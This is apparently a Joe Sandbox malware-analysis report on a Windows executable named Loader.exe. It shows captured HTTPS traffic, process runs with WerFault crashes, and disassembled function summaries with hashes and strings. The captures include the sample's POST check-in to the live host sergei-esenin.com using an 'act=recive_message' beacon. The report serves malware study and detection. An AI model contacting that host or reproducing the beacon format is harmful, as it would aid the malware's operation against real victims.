2024-10-12 20:36:12 UTC	818	IN	Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-12 20:36:12 UTC	1369	IN	Data Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
2024-10-12 20:36:12 UTC	1369	IN	Data Raw: 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 Data Ascii: ent/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input
2024-10-12 20:36:12 UTC	885	IN	Data Raw: 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 Data Ascii: <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand
2024-10-12 20:36:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49761	172.67.206.204	443	5200	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 20:36:13 UTC	354	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=P9r_mXsInYaSCDFf.Rj_aAUYNGZ0HMdPID1gWzVfqGI-1728765372-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: sergei-esenin.com
2024-10-12 20:36:13 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f 31 26 6a 3d 31 30 65 38 31 65 62 62 37 38 36 39 33 33 34 63 30 66 39 66 61 30 66 33 30 39 34 30 35 62 62 33 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@qjwo1&j=10e81ebb7869334c0f9fa0f309405bb3
2024-10-12 20:36:13 UTC	837	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 20:36:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o5e6giqtp9g285s2d82bc5g08u; expires=Wed, 05 Feb 2025 14:22:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hLjJqUVsgZ7GW%2B1K0pegef%2BLCJFDjwsvL1vF0wwMbPyDSwK2b%2BO%2B5HdQFZtlAjiX8soU1Dz3lLtMKkHHZCTlQ3Oq8xqZhjdcuU0bQajLVQNt4GZ%2BSp0uKO%2Fud%2F%2BMcMsvexk5xg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d19e17fccd18cbf-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 20:36:13 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 20:36:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	16:35:59
Start date:	12/10/2024
Path:	C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Loader.exe"
Imagebase:	0x190000
File size:	581'008 bytes
MD5 hash:	CB50ACC9B951B52306B95EAF8D4E2048
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:36:00
Start date:	12/10/2024
Path:	C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Loader.exe"
Imagebase:	0x190000
File size:	581'008 bytes
MD5 hash:	CB50ACC9B951B52306B95EAF8D4E2048
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:36:00
Start date:	12/10/2024
Path:	C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Loader.exe"
Imagebase:	0x190000
File size:	581'008 bytes
MD5 hash:	CB50ACC9B951B52306B95EAF8D4E2048
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:36:01
Start date:	12/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 284
Imagebase:	0x760000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:36:12
Start date:	12/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1884
Imagebase:	0x760000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	16:36:14
Start date:	12/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1904
Imagebase:	0x760000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.2%
Total number of Nodes:	254
Total number of Limit Nodes:	5

Executed Functions

Function 00192198 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00192348: _strlen.LIBCMT ref: 00192360

_strlen.LIBCMT ref: 0019220C
VirtualProtect.KERNELBASE(00213F00,000004E4,00000040,?,001BAABC,00000000,IOanz UZA891nNAIUsy U(Ahy8*! ), ref: 00192265

Part of subcall function 00192813: __EH_prolog3_catch.LIBCMT ref: 0019281A
Part of subcall function 00192813: _strlen.LIBCMT ref: 00192832

Part of subcall function 001930F8: __EH_prolog3_catch.LIBCMT ref: 001930FF

Strings

MZx, xrefs: 00192277, 00192283, 00192288
IOanz UZA891nNAIUsy U(Ahy8*! , xrefs: 001921AB

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: _strlen$H_prolog3_catch$ProtectVirtual
String ID: IOanz UZA891nNAIUsy U(Ahy8*! $MZx
API String ID: 2874085908-2632814837
Opcode ID: ecbaa23c4db6450f699b62d02e58978f41336b99e5133eaf00ba5a83ec95a6ad
Instruction ID: 57d569b21860d8796475f83c389c03190035b3b0fc40c7b279c1c19f2fe485ee
Opcode Fuzzy Hash: ecbaa23c4db6450f699b62d02e58978f41336b99e5133eaf00ba5a83ec95a6ad
Instruction Fuzzy Hash: 6F419071D04208BFDF04EBA4E955BEEB7F5EB58310F20442AF405A7281DB74AE45CB65

Function 001A8735 Relevance: 4.7, APIs: 3, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__freea.LIBCMT ref: 001A88E4

Part of subcall function 001A3D44: HeapAlloc.KERNEL32(00000000,00000000,?,?,00197815,?,?,?,?,?,001911CC,?,00000001), ref: 001A3D76

__freea.LIBCMT ref: 001A88F9
__freea.LIBCMT ref: 001A8909

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: __freea$AllocHeap
String ID:
API String ID: 85559729-0
Opcode ID: 9a8ea7a263cd98f45c7e3891b96ea2eb1d9e1b851ca706228a9648df060871d8
Instruction ID: 3170bca4503e1dafb3881ae0c60e62e8b02a38bcf934be1931c0f69a8df73697
Opcode Fuzzy Hash: 9a8ea7a263cd98f45c7e3891b96ea2eb1d9e1b851ca706228a9648df060871d8
Instruction Fuzzy Hash: 4051E4BA60020AAFEF259FA4CC81EBB3AA9EF56754B650128FD14E7141EF74CD508760

Function 001AA691 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001AA1C1: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 001AA1EC

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,001AA4D8,?,00000000,?,?,?), ref: 001AA6F2
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,001AA4D8,?,00000000,?,?,?), ref: 001AA734

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 18b8e371ca3167e4d178504d1b27081a7bc91f5c8ba15b8ddb54f87fa89836f2
Instruction ID: 20a971633a60ad9189a0e9a3801fa72024ddae710468ab8a0171b83b9b3e7efc
Opcode Fuzzy Hash: 18b8e371ca3167e4d178504d1b27081a7bc91f5c8ba15b8ddb54f87fa89836f2
Instruction Fuzzy Hash: B7517538A003459EDB21CF75C8806BBBBF4FF56304F98842ED08287251E77A9946CB92

Function 001A394D Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,001A8823,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 001A3981
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,001A8823,?,?,00000000,?,00000000), ref: 001A399F

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 0fc7c68c0b21d9eeb7f77aaab30c7f7a06de8c1a37d048997b6e55377f09814d
Instruction ID: ed8a5fcda0c9b90b412e390b4c3ddd1c3d33f85feda56891ce377dab356beaa2
Opcode Fuzzy Hash: 0fc7c68c0b21d9eeb7f77aaab30c7f7a06de8c1a37d048997b6e55377f09814d
Instruction Fuzzy Hash: 59F09D3640015ABBCF136F90DC09EDE3F26FF59764F054210FA2965020C772CA72AB91

Function 001AA295 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(E8458D00,?,001AA4E4,001AA4D8,00000000), ref: 001AA2C7

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: fda53950cf6632192d0dbf3ebace21921f3b2a52237724bfd46f01b8a1a8a536
Instruction ID: bd8d5803a1f69a23977a2f71a9b849285747ec5eeb41555172d063f1a2ddc082
Opcode Fuzzy Hash: fda53950cf6632192d0dbf3ebace21921f3b2a52237724bfd46f01b8a1a8a536
Instruction Fuzzy Hash: EF5159755042589ADF218B28CC84AFA7BBCEF5B304F6405ADE49AC7142D371AD46DB21

Non-executed Functions

Function 001DE6E0 Relevance: 38.9, Strings: 30, Instructions: 1384COMMON

Download Yara Rule

Strings

, xrefs: 001DEDF4, 001DEE0A
q2), xrefs: 001DE9D9
_=I?, xrefs: 001DF4C5
h, xrefs: 001DED3A
uFuS, xrefs: 001DE9AD
Ga@J, xrefs: 001DE929
%*+(, xrefs: 001DEFE5
tuv?, xrefs: 001DEBA0
<=>?, xrefs: 001DEB06
r}, xrefs: 001DF583
x, xrefs: 001DF17C
DsQX, xrefs: 001DE955
7ABC, xrefs: 001DF4DD
mnop, xrefs: 001DE997
`abc, xrefs: 001DEB69
pqrs, xrefs: 001DEB95
xr, xrefs: 001DF693
SH'T, xrefs: 001DE94A
h {, xrefs: 001DEB7F
y1D3, xrefs: 001DF4F5
z, xrefs: 001DEAC4
akm~, xrefs: 001DE93F
T, xrefs: 001DEA05
("C, xrefs: 001DEB74
6~, xrefs: 001DF68B
IJKL, xrefs: 001DE934
YZ[+, xrefs: 001DE960
LMNg, xrefs: 001DEB32
57W3, xrefs: 001DE91E
U^_`, xrefs: 001DE96B

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %*+($("C$57W3$6~$7ABC$<=>?$DsQX$Ga@J$IJKL$LMNg$SH'T$T$U^_`$YZ[+$_=I?$`abc$akm~$h$h {$mnop$pqrs$q2)$r}$tuv?$uFuS$x$xr$y1D3$z$
API String ID: 0-2038162739
Opcode ID: ec9c880e3599e62d0b092183d6071f06aa7f4272a887b332e50977fd4ac4672f
Instruction ID: 34358094e22847649c4c71759e36f00573108f8d2c462024bde9d6b75c4ecd25
Opcode Fuzzy Hash: ec9c880e3599e62d0b092183d6071f06aa7f4272a887b332e50977fd4ac4672f
Instruction Fuzzy Hash: E0A2CF705083818BD734CF25C8917ABBBE1EFD6304F18892DE5DA9B392D7749906CB92

Function 001CCFC0 Relevance: 16.6, Strings: 13, Instructions: 393COMMON

Download Yara Rule

Strings

rY, xrefs: 001CD382
\+^), xrefs: 001CD0DD
(S)Q, xrefs: 001CD14D
W?O=, xrefs: 001CD0F5
zkji, xrefs: 001CD15D
J<BJ, xrefs: 001CD2F8
,o}m, xrefs: 001CD155
o/^-, xrefs: 001CD0D5
'[(Y, xrefs: 001CD13D
|p|~, xrefs: 001CCFD2
%W'U, xrefs: 001CD145
_'[%, xrefs: 001CD0E5
6K;I, xrefs: 001CD11D

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %W'U$'[(Y$(S)Q$,o}m$6K;I$J<BJ$W?O=$\+^)$_'[%$o/^-$rY$zkji$|p|~
API String ID: 0-1309467693
Opcode ID: 5800caabe8bf62af63e3602459fe134d559dca4bc094b494e6b20d079e0d1c05
Instruction ID: b7dae458a5a06dd21d1effdc3d54f9508966745fde496629c2529eae71c2ccf8
Opcode Fuzzy Hash: 5800caabe8bf62af63e3602459fe134d559dca4bc094b494e6b20d079e0d1c05
Instruction Fuzzy Hash: E8D1E27150C3908FD318CF24945076BFBE1ABE2714F19893DE9E94B741D779D90A8B82

Function 001F9AD0 Relevance: 15.3, Strings: 12, Instructions: 295COMMON

Download Yara Rule

Strings

~, xrefs: 001F9DDD
!, xrefs: 001F9B8F
", xrefs: 001F9AE9
>, xrefs: 001F9CDE
9, xrefs: 001F9CD9
e, xrefs: 001F9DE7
!, xrefs: 001F9AE4
<, xrefs: 001F9CE8
, xrefs: 001F9B8A
", xrefs: 001F9B94
S, xrefs: 001F9DE2
, xrefs: 001F9ADF

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: $ $!$!$"$"$9$<$>$S$e$~
API String ID: 0-182234891
Opcode ID: a06918ebd65e9151fb0a4498747b54533d6e8a44d64da989032b065c48afe72d
Instruction ID: 2d6f507e0e9fad0d358cf1ebd417230b46556a3369779dc7bfa6200b4b001f93
Opcode Fuzzy Hash: a06918ebd65e9151fb0a4498747b54533d6e8a44d64da989032b065c48afe72d
Instruction Fuzzy Hash: 35B1557391C7E04AD311953C8C8436BAED25BE6224F1E8BADD9E5C73C7D269C8068363

Function 001FA1A0 Relevance: 15.3, Strings: 12, Instructions: 262COMMON

Download Yara Rule

Strings

%, xrefs: 001FA419
(, xrefs: 001FA425
+, xrefs: 001FA1CA
+, xrefs: 001FA421
%, xrefs: 001FA2E3
*, xrefs: 001FA41D
(, xrefs: 001FA2EF
+, xrefs: 001FA2EB
*, xrefs: 001FA2E7
*, xrefs: 001FA1C6
(, xrefs: 001FA1CE
%, xrefs: 001FA1C2

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %$%$%$($($($*$*$*$+$+$+
API String ID: 0-447118901
Opcode ID: 50df7104dc4f15aa91ae1e960bf13180e0c269086872ccad6f8f2714a46e31c9
Instruction ID: 6b5c07a4b9edbaabafde7927052ebc0113ead9e31d7dcb911df3e2f6a2f699d6
Opcode Fuzzy Hash: 50df7104dc4f15aa91ae1e960bf13180e0c269086872ccad6f8f2714a46e31c9
Instruction Fuzzy Hash: 55A147B1E083588FDB04CBA8D4543BD7BA2AF85310F5D842CDA5AA73C2D77D89418B53

Function 001E31E2 Relevance: 13.3, Strings: 10, Instructions: 832COMMON

Download Yara Rule

Strings

E{G}, xrefs: 001E37AC
0_!Q, xrefs: 001E377B
'G1Y, xrefs: 001E376D
F7UI, xrefs: 001E3751
kW1i, xrefs: 001E3789
1K-M, xrefs: 001E3758
O*A, xrefs: 001E375F
D3C5, xrefs: 001E374A
$[.], xrefs: 001E3774
'C$E, xrefs: 001E3766

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
